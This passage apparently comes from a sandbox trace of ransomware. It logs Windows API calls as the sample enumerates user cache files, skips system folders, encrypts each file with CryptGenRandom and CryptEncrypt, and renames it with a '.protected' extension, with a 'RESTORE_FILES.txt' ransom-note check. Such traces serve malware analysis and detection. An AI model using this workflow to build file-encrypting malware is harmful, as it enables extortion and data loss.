HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned 152 [0089.076] StrStrW (lpFirst="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpSrch=".rar") returned 0x0 [0089.076] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned 152 [0089.076] StrStrW (lpFirst="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpSrch=".zip") returned 0x0 [0089.076] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0089.077] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.077] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x194, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0089.077] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.077] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.077] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.078] CloseHandle (hObject=0x150) returned 1 [0089.078] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.protected") returned 162 [0089.078] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9.protected")) returned 1 [0089.078] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.078] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="Windows") returned -1 [0089.078] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="Program Files") returned -1 [0089.078] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="Program Files (x86)") returned -1 [0089.078] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="$Recycle.bin") returned 1 [0089.078] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="System Volume Information") returned -1 [0089.078] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned 152 [0089.078] StrStrIW (lpFirst="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpSrch=".protected") returned 0x0 [0089.078] lstrcmpW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="RESTORE_FILES.txt") returned -1 [0089.078] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.079] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.079] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.079] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned 152 [0089.079] StrStrW (lpFirst="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpSrch=".txt") returned 0x0 [0089.079] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned 152 [0089.079] StrStrW (lpFirst="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpSrch=".rar") returned 0x0 [0089.079] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned 152 [0089.079] StrStrW (lpFirst="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpSrch=".zip") returned 0x0 [0089.079] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.080] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.080] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.080] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.080] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.080] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.080] CloseHandle (hObject=0x150) returned 1 [0089.080] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.protected") returned 162 [0089.080] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6.protected")) returned 1 [0089.081] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.081] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="Windows") returned -1 [0089.081] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="Program Files") returned -1 [0089.081] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="Program Files (x86)") returned -1 [0089.081] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="$Recycle.bin") returned 1 [0089.081] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="System Volume Information") returned -1 [0089.081] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned 152 [0089.081] StrStrIW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpSrch=".protected") returned 0x0 [0089.081] lstrcmpW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="RESTORE_FILES.txt") returned -1 [0089.081] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.081] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.081] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.081] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned 152 [0089.081] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpSrch=".txt") returned 0x0 [0089.081] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned 152 [0089.081] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpSrch=".rar") returned 0x0 [0089.081] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned 152 [0089.082] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpSrch=".zip") returned 0x0 [0089.082] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.082] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.082] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.082] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.082] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.083] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.083] CloseHandle (hObject=0x150) returned 1 [0089.083] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.protected") returned 162 [0089.083] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e.protected")) returned 1 [0089.083] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.083] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="Windows") returned -1 [0089.083] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="Program Files") returned -1 [0089.084] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="Program Files (x86)") returned -1 [0089.084] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="$Recycle.bin") returned 1 [0089.084] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="System Volume Information") returned -1 [0089.084] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned 152 [0089.084] StrStrIW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpSrch=".protected") returned 0x0 [0089.084] lstrcmpW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="RESTORE_FILES.txt") returned -1 [0089.084] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.084] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.084] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned 152 [0089.084] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpSrch=".txt") returned 0x0 [0089.084] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned 152 [0089.084] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpSrch=".rar") returned 0x0 [0089.084] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned 152 [0089.084] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpSrch=".zip") returned 0x0 [0089.084] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.085] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.085] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.085] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.085] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.085] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.085] CloseHandle (hObject=0x150) returned 1 [0089.085] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.protected") returned 162 [0089.085] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061.protected")) returned 1 [0089.086] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.086] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="Windows") returned -1 [0089.086] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="Program Files") returned -1 [0089.086] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="Program Files (x86)") returned -1 [0089.086] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="$Recycle.bin") returned 1 [0089.086] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="System Volume Information") returned -1 [0089.086] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned 152 [0089.086] StrStrIW (lpFirst="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpSrch=".protected") returned 0x0 [0089.086] lstrcmpW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="RESTORE_FILES.txt") returned -1 [0089.086] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.086] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.086] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.087] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned 152 [0089.087] StrStrW (lpFirst="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpSrch=".txt") returned 0x0 [0089.087] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned 152 [0089.087] StrStrW (lpFirst="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpSrch=".rar") returned 0x0 [0089.087] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned 152 [0089.087] StrStrW (lpFirst="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpSrch=".zip") returned 0x0 [0089.087] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1ae, lpOverlapped=0x0) returned 1 [0089.088] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.088] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1ae, lpNumberOfBytesWritten=0x295e7b4, 